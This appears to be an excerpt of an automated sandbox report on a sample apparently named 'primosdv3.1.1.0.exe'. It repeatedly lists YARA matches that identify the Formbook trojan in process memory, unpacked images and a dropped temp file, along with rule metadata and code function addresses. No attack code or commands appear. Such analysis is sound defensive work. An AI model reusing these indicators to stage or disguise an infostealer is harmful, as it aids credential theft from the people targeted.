            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: primosdv3.1.1.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6848E
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C76CDC
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C640FE
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C74088
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C700B7
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C851C9
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C77153
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C762CA
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C632F7
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C743BF
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C8D440
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6F461
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6C426
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C777EF
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C8D8EE
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6286B
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C919F4
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6E9B7
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C73E0B
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6EFE2
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C84F9A
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 1_2_00BD0227
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01711D55
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01640D20
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01664120
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164F900
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165D5E0
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672581
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701002
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165841F
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165B090
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167EBB0
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01666E30
